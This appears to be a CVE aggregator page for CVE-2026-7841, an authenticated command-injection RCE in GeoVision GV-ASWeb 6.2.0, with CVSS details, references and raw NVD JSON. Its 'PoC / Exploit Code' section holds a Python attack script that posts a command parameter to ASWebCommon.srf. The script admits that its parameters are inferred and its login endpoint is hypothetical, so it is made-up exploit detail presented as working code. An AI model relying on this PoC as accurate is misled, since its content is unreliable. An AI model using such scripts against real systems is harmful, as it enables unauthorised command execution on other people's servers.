CVE-2026-7841

Description

A remote code execution vulnerability exists in Notification Settings on GeoVision GV-ASWeb 6.2.0. An authenticated user with System Setting permissions can execute arbitrary commands on the server by sending a crafted HTTP POST request to the ASWebCommon.srf backend endpoint to bypass the frontend restrictions.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GeoVision GV-ASWeb 6.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-7841 PoC Concept
# Target: GeoVision GV-ASWeb 6.2.0
# Endpoint: ASWebCommon.srf

target = "http://target-ip/ASWebCommon.srf"
username = "admin"  # User with System Setting permissions
password = "password"

# The malicious command to execute (e.g., creating a test file)
# Payload syntax depends on the underlying OS (likely Windows/Linux based on product)
command = "whoami"

# Construct the malicious payload
# Parameters are inferred based on typical vuln patterns in this context
payload = {
    "setting_type": "notification",
    "command": command  # Vulnerable parameter
}

try:
    # 1. Authenticate (Hypothetical login endpoint)
    session = requests.Session()
    login_resp = session.post("http://target-ip/login.php", data={"user": username, "pass": password})
    
    if login_resp.status_code == 200:
        print("[+] Login successful")
        
        # 2. Send Exploit Request
        exploit_resp = session.post(target, data=payload)
        
        if exploit_resp.status_code == 200:
            print("[+] Exploit sent successfully")
            print("[+] Response:")
            print(exploit_resp.text)
        else:
            print("[-] Exploit request failed")
    else:
        print("[-] Login failed")
        
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7841
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7841
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7841/
[4] VulDB https://vuldb.com/cve/CVE-2026-7841
[5] https://www.geovision.com.tw/cyber_security.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7841", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-05-06T08:16:04.490", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote code execution vulnerability\nexists in Notification Settings on GeoVision GV-ASWeb 6.2.0. An authenticated\nuser with System Setting permissions can execute arbitrary commands on the\nserver by sending a crafted HTTP POST request to the ASWebCommon.srf backend\nendpoint to bypass the frontend restrictions."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9"}]}}